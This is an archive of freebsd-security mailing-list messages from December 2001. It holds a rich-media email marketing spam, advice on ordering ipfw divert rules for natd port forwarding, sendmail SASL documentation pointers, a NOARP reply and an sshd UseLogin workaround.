Received: from mta.excite.com (11Cust211.tnt4.plano.tx.temp.da.uu.net [67.203.104.211]) by main.phantom.gr.jp with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id YGYGXYRM; Wed, 5 Dec 2001 16:17:30 +0900
Message-ID: <000005092ca0$00005edb$00005381@mta.excite.com>
To: <Business-Owner@FreeBSD.ORG>
From: RichMedia2@excite.com
Subject: Rich Media E-Mail Messages At The Price Of HTML                  
Date: Wed, 05 Dec 2001 01:18:20 -1800
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Reply-To: RichMedia7@excite.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

<html>
<BODY leftmargin=3D"0" topmargin=3D"0" marginwidth=3D"0" marginheight=3D"0=
">
<META content=3D"Microsoft FrontPage 5.0" name=3DGENERATOR>
<DIV>&nbsp;&nbsp;</DIV>
<CENTER>
  <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D560 border=3D0>
    <TBODY> 
    <TR> 
      <TD align=3Dmiddle colSpan=3D3><IMG height=3D20 src=3D"http://209.16=
4.32.74/promo_mailer/Wrapper_files/topbar.gif" width=3D580 NOSEND=3D"1"></=
TD>
    </TR>
    <TR> 
      <TD width=3D4 bgColor=3D#467ec3><IMG height=3D1 src=3D"http://209.16=
4.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 border=3D0 NOSEND=3D=
"1"></TD>
      <TD width=3D570> 
        <TABLE cellSpacing=3D0 cellPadding=3D0 bgColor=3D#467ec4 border=3D=
0>
          <TBODY> 
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3 height=3D15> 
              <div align=3D"center"><font face=3D"Verdana, Arial, Helvetic=
a, sans-serif" 
            color=3Dwhite size=3D3><b><a target=3D_blank href=3D"http://20=
9.164.32.74/promo_mailer/jumper.html"><font 
            color=3D#ffffff size=3D2>Click here if you are unable to view =
the following 
                Rich Media message</font></a></b></font></div>
            </TD>
          </TR>
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3><IMG height=3D1 src=3D"http:=
//209.164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1=
"></TD>
          </TR>
          <TR> 
            <TD vAlign=3Dcenter align=3Dmiddle bgColor=3D#467ec3 colSpan=3D=
3 height=3D"1"><IMG height=3D1 src=3D"http://209.164.32.74/promo_mailer/Wr=
apper_files/shim.gif" width=3D1 NOSEND=3D"1"> 
              <CENTER>
              <p></p>
              </CENTER>
            </TD>
          </TR>
          <TR> 
            <TD bgColor=3Dwhite colSpan=3D3> 
              <TABLE cellSpacing=3D0 cellPadding=3D5 width=3D564 border=3D=
0 height=3D"48">
                <TBODY> 
                <TR> 
                  <TD width=3D45>&nbsp;</TD>
                  <TD vAlign=3Dtop width=3D480 bgColor=3Dwhite> 
                    <DIV align=3Dcenter><IMG height=3D1 src=3D"http://209.=
164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1"><BR>
                      <FONT 
                  face=3D"Arial, Helvetica, sans-serif"><B>FINALLY! Rich M=
edia E-Mail 
                      Messages At The Price Of HTML, <br>
                      X<font size=3D"3">-stream-Mail</font> Slashes the Pr=
ice Barrier 
                      - $299 Special</B></FONT><B><BR>
                      </B></DIV>
                  </TD>
                  <TD width=3D9>&nbsp;</TD>
                </TR>
                </TBODY>
              </TABLE>
            </TD>
          </TR>
          <TR> 
            <TD align=3Dmiddle bgColor=3D#ffffff colSpan=3D3 height=3D"225=
"> 
              <p align=3D"center"><object 
            codebase=3Dhttp://download.macromedia.com/pub/shockwave/cabs/f=
lash/swflash.cab#version=3D4,0,2,0 
            classid=3Dclsid:D27CDB6E-AE6D-11cf-96B8-444553540000 width=3D4=
00 
            height=3D300>
                  <param name=3D"movie" value=3D"http://209.164.32.74/prom=
o_mailer/Wrapper_files/ngemercial5.swf">
                  <param name=3D"_cx" value=3D"10583">
                  <param name=3D"_cy" value=3D"7938">
                  <param name=3D"Movie" value=3D"http://209.164.32.74/prom=
o_mailer/Wrapper_files/ngemercia5.swf">
                  <param name=3D"Src" value=3D"http://209.164.32.74/promo_=
mailer/Wrapper_files/ngemercial5.swf">
                  <param name=3D"WMode" value=3D"Window">
                  <param name=3D"Play" value=3D"-1">
                  <param name=3D"Loop" value=3D"-1">
                  <param name=3D"Quality" value=3D"High">
                  <param name=3D"SAlign" value=3D"">
                  <param name=3D"Menu" value=3D"-1">
                  <param name=3D"Base" value=3D"">
                  <param name=3D"Scale" value=3D"ShowAll">
                  <param name=3D"DeviceFont" value=3D"0">
                  <param name=3D"EmbedMovie" value=3D"0">
                  <param name=3D"BGColor" value=3D"">
                  <param name=3D"SWRemote" value=3D"">
                  <embed src=3D"http://209.164.32.74/promo_mailer/Wrapper_=
files/ngemercial5.swf" type=3D"application/x-shockwave-flash" width=3D"400=
" height=3D"300" pluginspage=3D"http://www.macromedia.com/shockwave/downlo=
ad/index.cgi?P1_Prod_Version=3DShockwaveFlash" quality=3D"best" play=3D"tr=
ue">
                  </embed></object></p>
              </TD>
          </TR>
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3> 
              <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D571 bgColor=3D=
#467ec4 
            border=3D0>
                <TBODY> 
                <TR> 
                  <TD colSpan=3D3> 
                    <TABLE height=3D81 cellSpacing=3D0 cellPadding=3D0 wid=
th=3D"100%" 
                  border=3D0>
                 </TABLE>
                  </TD>
                </TR>
                </TBODY>
              </TABLE>
            </TD>
          </TR>
          <TR> 
            <TD bgColor=3D#ffffff colSpan=3D3> 
              <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=
=3D0>
                <TBODY> 
                <TR bgColor=3D#467ec3> 
                  <TD><IMG height=3D1 src=3D"http://209.164.32.74/promo_ma=
iler/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1"></TD>
                </TR>
                <TR> 
                  <TD vAlign=3Dtop align=3Dmiddle> 
                    <TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" =
border=3D0>
                      <TBODY> 
                      <TR> 
                        <TD valign=3D"top"> 
                          <DIV align=3Djustify> 
                            <P><FONT face=3D"Arial, Helvetica, sans-serif"=
 size=3D1>Ever 
                              wonder how these types of rich media e-mails=
 are 
                              created? Do you wish you could produce or se=
ll this 
                              type of service? Did you think you could nev=
er afford 
                              to implement such a campaign? Now you can. X=
-stream-Mail 
                              will help you create, deliver and track targ=
eted 
                              and global rich media E-Mail marketing campa=
igns 
                              delivering effective messaging that gets att=
ention, 
                              plus online statistics and reporting analysi=
s that 
                              help you make decisions. X-stream-Mail's ser=
vices 
                              are creative, responsive, and affordable. </=
FONT></P>
                            <P align=3D"center"><b><font face=3D"Arial, He=
lvetica, sans-serif" size=3D"3">Contact 
                            X-stream-Mail</font><font face=3D"Arial, Helve=
tica, sans-serif" size=3D"3"> 
                              Today For More Details</font></b></P>
                            <form action=3D"mailto:RichMedia1@excite.com?s=
ubject=3DDirect Email Inquiry" method=3D"POST" enctype=3D"text/plain">
                              <div align=3D"center"> 
                                <center>
                                  <table height=3D"226" width=3D"300" bgco=
lor=3D"#ffffff">
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"19"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">First 
                                          Name:</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"19"> 
                                        <input value=3D" " name=3D" FIRST =
NAME " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <p align=3D"right"><font face=3D"A=
rial" size=3D"2">Last 
                                          Name:</font> 
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" LAST N=
AME " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">City:</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" City "=
 coname=3D"COMPANY_NAME" size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">State:</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" STATE =
" size=3D"20">
                                        &nbsp;&nbsp; </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" size=3D"2">Zip 
                                          Code :</font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" Zip Co=
de " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <div align=3D"right"> <font face=3D=
"Arial" color=3D"#000000"><font size=3D"2">Daytime&nbsp;</font><font face=3D=
"Arial, Helvetica, sans-serif" size=3D"2">Phone:</font></font></div>
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" NIGHT =
PHONE " size=3D"20">
                                      </td>
                                    </tr>
                                    <tr> 
                                      <td bordercolor=3D"#808080" borderco=
lorlight=3D"#808080" width=3D"292" bgcolor=3D"#c0c0c0" height=3D"25"> 
                                        <p align=3D"right"> <font face=3D"=
Arial, Helvetica, sans-serif" size=3D"2">Nighttime 
                                          Phone:</font> 
                                      </td>
                                      <td width=3D"434" bgcolor=3D"#c0c0c0=
" height=3D"25"> 
                                        <input value=3D" " name=3D" NIGHT =
PHONE " size=3D"20">
                                      </td>
                                    </tr>
                                  </table>
                                </center>
                              </div>
                              <div align=3D"center"> &nbsp; </div>
                              <div align=3D"center"> 
                                <input type=3D"submit" value=3D" Submit In=
formation" name=3D" submit ">
                              </div>
                            </form>
                            <P align=3D"center"><font face=3D"Arial, Helve=
tica, sans-serif" size=3D1>&nbsp;</font><font size=3D"2"><i><span style=3D=
"font-size: 10pt; font-family: Arial">If 
                              you think, that you will not benefit from th=
is correspondence</span>, 
                              please <a href=3D"http://www.removeyou.com">=
click 
                              here</a> </i></font></P>
                          </DIV>
                        </TD>
                      </TR>
                      </TBODY>
                    </TABLE>
                  </TD>
                </TR>
                </TBODY>
              </TABLE>
            </TD>
          </TR>
          <TR align=3Dright> 
            <TD bgColor=3D#467ec3 colSpan=3D3><IMG height=3D5 src=3D"http:=
//209.164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1=
"></TD>
          </TR>
          <TR> 
            <TD bgColor=3D#467ec3 colSpan=3D3><IMG height=3D1 src=3D"http:=
//209.164.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 NOSEND=3D"1=
"></TD>
          </TR>
          </TBODY>
        </TABLE>
      </TD>
      <TD width=3D4 bgColor=3D#467ec3><IMG height=3D1 src=3D"http://209.16=
4.32.74/promo_mailer/Wrapper_files/shim.gif" width=3D1 border=3D0 NOSEND=3D=
"1"></TD>
    </TR>
    </TBODY>
  </TABLE>
</CENTER>
</BODY>
</HTML>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 23:59:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsd.electromir.ru (bsd.electromir.ru [195.14.44.190])
	by hub.freebsd.org (Postfix) with ESMTP id CE4A437B405
	for <freebsd-security@FreeBSD.ORG>; Tue,  4 Dec 2001 23:59:25 -0800 (PST)
Received: from mail.office.electromir.ru (mail.office.electromir.ru [192.168.0.50])
	by bsd.electromir.ru (8.11.3/8.11.3) with SMTP id fB57w9n19539;
	Wed, 5 Dec 2001 10:58:30 +0300 (MSK)
Received: from electromir.ru ([192.168.0.38]) by mail.office.electromir.ru (Lotus SMTP MTA v4.6.6  (890.1 7-16-1999)) with SMTP id C3256B19.002BB55F; Wed, 5 Dec 2001 10:57:24 +0300
Message-ID: <3C0DD3BC.9F8607C0@electromir.ru>
Date: Wed, 05 Dec 2001 10:58:52 +0300
From: Dmitriy Kyrhlarov <dimma@electromir.ru>
X-Mailer: Mozilla 4.72 [en] (Win95; I)
X-Accept-Language: ru,en
MIME-Version: 1.0
To: Vladimir Pianykh <fox@vl7.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw
References: <8440AF63646E92A9C3256B19000DC77B.000DC7A5C3256B19@electromir.ru>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi!

When you are write:
ipfw add 0900 divert 8887 ip from any to any via $ext_i
all packets go to this natd, and your rules 1000, 1100, 1500, 1600 not
worked.
You are need write:
ipfw add 1900 divert 8887 ip from any to any via $ext_i
i.e. this rules must go _after_ web&mail diverts.

Sorry for my english and sorry if it not a security questionl.

By.
Dmitriy

Vladimir Pianykh wrote:
> 
> Hi!
> 
> I tried to make port forwarding to server in internal network, and nat for
> users in same network. Just port forwarding is working fine, but if I
> enable masquarad for internal network, I'm losing connection to redirected
> servers.
> 
> What is wrong in my script?
> 
> Thank you.
> 
> out=192.168.2.1
> ext_i=ep0
> int_serv_1=192.168.1.1
> port_1=80
> int_serv_2=192.168.1.2
> port_2=25
> 
> ########################## forwarding ###############################
> 
> ipfw add 1000 divert 8888 tcp from any to $out $port_1 via $ext_i
> ipfw add 1100 divert 8888 ip from $int_serv_1 to any via $ext_i
> natd -p 8888 -n $ext_i -redirect_port tcp $int_serv_1:$port_1 $port_1
> 
> #--------------------------------------------------------------------
> 
> ipfw add 1500 divert 8889 tcp from any to $out $port_2 via $ext_i
> ipfw add 1600 divert 8889 ip from $int_serv_2 to any via $ext_i
> natd -p 8889 -n $ext_i -redirect_port tcp $int_serv_2:$port_2 $port_2
> 
> ############################ NAT ####################################
> 
> ipfw add 0900 divert 8887 ip from any to any via $ext_i
> natd -p 8887 -n $ext_i
> 
> ipfw add 65000 allow ip from any to any
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  1:34:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from switchblade.cyberpunkz.org (switchblade.cyberpunkz.org [198.174.169.125])
	by hub.freebsd.org (Postfix) with ESMTP id 46D0537B417
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 01:34:33 -0800 (PST)
Received: from switchblade.cyberpunkz.org (rob@localhost.cyberpunkz.org [127.0.0.1])
	by switchblade.cyberpunkz.org (8.12.1/CpA-TLS-1.2.12-1) with ESMTP id fB59YVgI062889
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for <freebsd-security@freebsd.org>; Wed, 5 Dec 2001 03:34:32 -0600 (CST)?g
	(envelope-from rob@switchblade.cyberpunkz.org)�
Posted-Date: Wed, 5 Dec 2001 03:34:32 -0600 (CST)
Abuse-Contact: abuse@cyberpunkz.org
Received: (from rob@localhost)
	by switchblade.cyberpunkz.org (8.12.1/8.12.1/Submit) id fB59YUbD062888
	for freebsd-security@freebsd.org; Wed, 5 Dec 2001 03:34:30 -0600 (CST)?g
	(envelope-from rob)
Date: Wed, 5 Dec 2001 03:34:30 -0600
From: Rob Andrews <rob@cyberpunkz.org>
To: freebsd-security@freebsd.org
Subject: sendmail sasl..
Message-ID: <20011205033430.D56011@switchblade.cyberpunkz.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="6c2NcOVqGQ03X4Wi"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--6c2NcOVqGQ03X4Wi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

I'm wondering if anyone here knows of a comprehensive doc or website somewhere
that explains in better detail the proper setup for sendmail with sasl.

The information provided via sendmail.org is a bit cryptic in regard to how
to accomplish a clean setup.  Would have figured better information would have
been provided with the port but the port does little more than compile and
install the software..  It doesn't give hints or docs on finalizing the
install so that you're assured that you have it setup correctly.

Any help would be appreciated..

Rob Andrews


--6c2NcOVqGQ03X4Wi
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DeomAXwJ9YLqJJURAhk+AJ414wGs8O04hmTchRahPgf1H6q+7gCeMUtF
BLAzeGG6YU8i70FHWJQ6EZw=
=lleO
-----END PGP SIGNATURE-----

--6c2NcOVqGQ03X4Wi--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  1:50:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.hq.newdream.net (mail.hq.newdream.net [216.246.35.10])
	by hub.freebsd.org (Postfix) with ESMTP id 00B0A37B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 01:50:21 -0800 (PST)
Received: from zugzug.hq.newdream.net (zugzug.hq.newdream.net [127.0.0.1])
	by ravscan.zugzug.hq.newdream.net (Postfix) with SMTP id C01FC3B396
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 01:50:20 -0800 (PST)
Received: by mail.hq.newdream.net (Postfix, from userid 1012)
	id 954FA3B394; Wed,  5 Dec 2001 01:50:20 -0800 (PST)
Date: Wed, 5 Dec 2001 01:50:20 -0800
From: Owner of many system processes <william@hq.newdream.net>
To: freebsd-security@freebsd.org
Subject: Re: sendmail sasl..
Message-ID: <20011205095020.GA12381@hq.newdream.net>
Mail-Followup-To: freebsd-security@freebsd.org
References: <20011205033430.D56011@switchblade.cyberpunkz.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="GvXjxJ+pjyke8COw"
Content-Disposition: inline
In-Reply-To: <20011205033430.D56011@switchblade.cyberpunkz.org>
User-Agent: Mutt/1.3.24i
Organization: New Dream Network
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--GvXjxJ+pjyke8COw
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Rob Andrews wrote:

> I'm wondering if anyone here knows of a comprehensive doc or website
> somewhere that explains in better detail the proper setup for sendmail
> with sasl.

if you're looking for information on auth smtp etc., this link will
prolly be useful:

http://www.sendmail.org/~ca/email/auth.html#AUTH

--=20
William Yardley                   System Administrator, Newdream Network
william@hq.newdream.net         http://infinitejazz.net/will/pgp/gpg.asc

--GvXjxJ+pjyke8COw
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8De3cswHW5vg5XAIRAiwMAKCFnpES8bGJiPC5vkUnq9SaeLudggCdGSq9
BIlhMFnbfZmUcsk8RlbytyI=
=rN0Q
-----END PGP SIGNATURE-----

--GvXjxJ+pjyke8COw--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  2:32:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 1E24237B41D
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 02:32:15 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB5AWED10070
	for <freebsd-security@freebsd.org>; Wed, 5 Dec 2001 10:32:14 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id DAA20102
	for freebsd-security@freebsd.org; Wed, 5 Dec 2001 03:05:34 GMT
From: "Lucey, Bryan" <freebsd-security-local@insignia.com>
To: "local.freebsd.security" <local.freebsd.security@insignia.com>
Subject: Hi
Date: Tue, 4 Dec 2001 14:24:52 -0800
Message-ID: <F098252D3EC7D21191DB00A0C9337ECBD924D6@exchange-us.isinc.insignia.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C17D12.7E09F670"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

<<< No Message Collected >>>
------_=_NextPart_000_01C17D12.7E09F670--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  2:32:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 978DC37B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 02:32:21 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB5AWKD10173
	for <freebsd-security@freebsd.org>; Wed, 5 Dec 2001 10:32:20 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id WAA13198
	for freebsd-security@freebsd.org; Tue, 4 Dec 2001 22:24:12 GMT
From: "Lucey, Bryan" <freebsd-security-local@insignia.com>
To: "local.freebsd.security" <local.freebsd.security@insignia.com>
Subject: Hi
Date: Tue, 4 Dec 2001 14:23:11 -0800
Message-ID: <F098252D3EC7D21191DB00A0C9337ECBD923F2@exchange-us.isinc.insignia.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C17D12.41E82220"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

<<< No Message Collected >>>
------_=_NextPart_000_01C17D12.41E82220--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  4: 3:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gull.prod.itd.earthlink.net (gull.mail.pas.earthlink.net [207.217.120.84])
	by hub.freebsd.org (Postfix) with ESMTP
	id 0FCBC37B419; Wed,  5 Dec 2001 04:03:49 -0800 (PST)
Received: from dialup-209.244.107.135.dial1.sanjose1.level3.net ([209.244.107.135] helo=blossom.cjclark.org)
	by gull.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16Bam0-0001OX-00; Wed, 05 Dec 2001 04:03:41 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB5C3PO02925;
	Wed, 5 Dec 2001 04:03:25 -0800 (PST)
	(envelope-from cjc)
Date: Wed, 5 Dec 2001 04:03:16 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Eugene Grosbein <eugen@www.svzserv.kemerovo.su>
Cc: security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205040316.H40864@blossom.cjclark.org>
References: <20011205124430.A83642@svzserv.kemerovo.su>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205124430.A83642@svzserv.kemerovo.su>; from eugen@www.svzserv.kemerovo.su on Wed, Dec 05, 2001 at 12:44:30PM +0700
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 12:44:30PM +0700, Eugene Grosbein wrote:
> Hi!
> Not sure what is correct list, this is about network security.
> 
> Flag NOARP did not work for ethernet interface before 4.4-RELEASE.
> We needed static ARP table so used local patch for it.
> 4.4-RELEASE implemented NOARP but in the different way.

See PR 31873.
-- 
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  4:52:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id 8F34737B416
	for <security@FreeBSD.ORG>; Wed,  5 Dec 2001 04:52:47 -0800 (PST)
Received: from fazendinha (ressacada.melim.com.br [200.215.110.4])
	by salseiros.melim.com.br (Postfix) with SMTP
	id 530B9BAAB; Wed,  5 Dec 2001 10:52:43 -0200 (BRST)
Message-ID: <01e501c17d8b$fc371900$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: "Erick Mechler" <emechler@techometer.net>,
	"Henry smith" <getzz11@yahoo.com>
Cc: <security@FreeBSD.ORG>
References: <20011205010118.50293.qmail@web21109.mail.yahoo.com> <20011204172605.T66947@techometer.net>
Subject: Re: upgrade sshd ?
Date: Wed, 5 Dec 2001 10:54:32 -0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

You can do a workaround.

Just set UseLogin no

[]�s

Ronan Lucio
Melim Internet Provider

